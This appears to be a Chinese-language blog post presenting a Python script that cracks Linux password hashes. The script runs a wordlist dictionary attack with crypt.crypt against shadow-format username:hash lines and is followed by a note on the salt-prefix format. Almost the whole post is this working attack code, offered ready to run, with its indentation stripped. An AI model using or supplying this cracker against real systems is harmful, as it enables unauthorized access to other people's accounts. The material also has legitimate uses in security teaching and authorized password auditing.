利用Python破解Linux密码
利用Python破解Linux密码
import sys
import optparse
import os
import crypt
# The Program is intended to decyrpt Linux hashed password
# The main module will be crypt
# crypt.crypt(word, salt=None)
# word will usually be a user’s password as typed at a prompt or in a graphical interface. The optional salt is either a string as returned from mksalt(), one of the crypt.METHOD_* values (though not all may be available on all platforms), or a full encrypted password including salt, as returned by this function. If salt is not provided, the strongest method available in methods will be used.
# Checking a password is usually done by passing the plain-text password as word and the full results of a previous crypt() call, which should be the same as the results of this call.
# salt (either a random 2 or 16 character string, possibly prefixed with $digit$ to indicate the method) which will be used to perturb the encryption algorithm. The characters in salt must be in the set [./a-zA-Z0-9], with the exception of Modular Crypt Format which prefixes a $digit$.
# Returns the hashed password as a string, which will be composed of characters from the same alphabet as the salt.
# Since a few crypt(3) extensions allow different values, with different sizes in the salt, it is recommended to use the full crypted password as salt when checking for a password.
# Changed in version 3.3: Accept crypt.METHOD_* values in addition to strings for salt.
class PasswordDecryptor:
def __init__(self) -> None:
self.filename = self.get_params()[0]
self.wordlist = self.get_params()[1]
self.check_file(self.filename)
self.check_file(self.wordlist)
def get_params(self):
parser = optparse.OptionParser('Usage:./%s -f password filename -w wordlist' % sys.argv[0])
parser.add_option('-f', '--filename', dest='filename', type='string', help='Specify hashed password to crack')
parser.add_option('-w', '--wordlist', dest='wordlist', type='string', help='Specify wordlist')
options, args = parser.parse_args()
if options.filename is None or options.wordlist is None:
print('[-]',parser.usage)
sys.exit()
return options.filename, options.wordlist
def check_file(self,filename):
if not os.path.isfile(filename):
print("The file %s does not exist!" % filename)
sys.exit()
elif not os.access(filename,os.R_OK):
print("No privilege to access the file %s" % filename)
sys.exit()
def decrypt(self,salt, hashed_password):
with open(self.wordlist,'r') as f:
while True:
try:
line = f.readline()
if len(line) == 0:
break
clear_text = line.strip()
print("[-] Attempt to decrypt with %s" % clear_text)
result = crypt.crypt(clear_text, salt)
if result == salt + '$' + hashed_password:
print("[+] Password found! %s" % clear_text)
sys.exit()
except:
continue
def run(self):
with open(self.filename,'r') as pf:
for line in pf.readlines():
username = line.split(':')[0]
hash_password_all = line.split(':')[1].strip()
salt = '$' + hash_password_all.split('$')[1] + '$' + hash_password_all.split('$')[2]
hash_password = hash_password_all.split('$')[3]
print('[+] Start to crack password for %s' % username)
self.decrypt(salt,hash_password)
if __name__ == '__main__':
decryptor = PasswordDecryptor()
decryptor.run()
注意点
Python crypt模块的crypt方法传输的salt值需要将表示Hash加密算法的值同时传入,比如对于MD5加密的密码需要将以下值作为salt传入:
$1$XN10Zj2c
而不仅仅是
XN10Zj2c
STRIVE FOR PROGRESS,NOT FOR PERFECTION
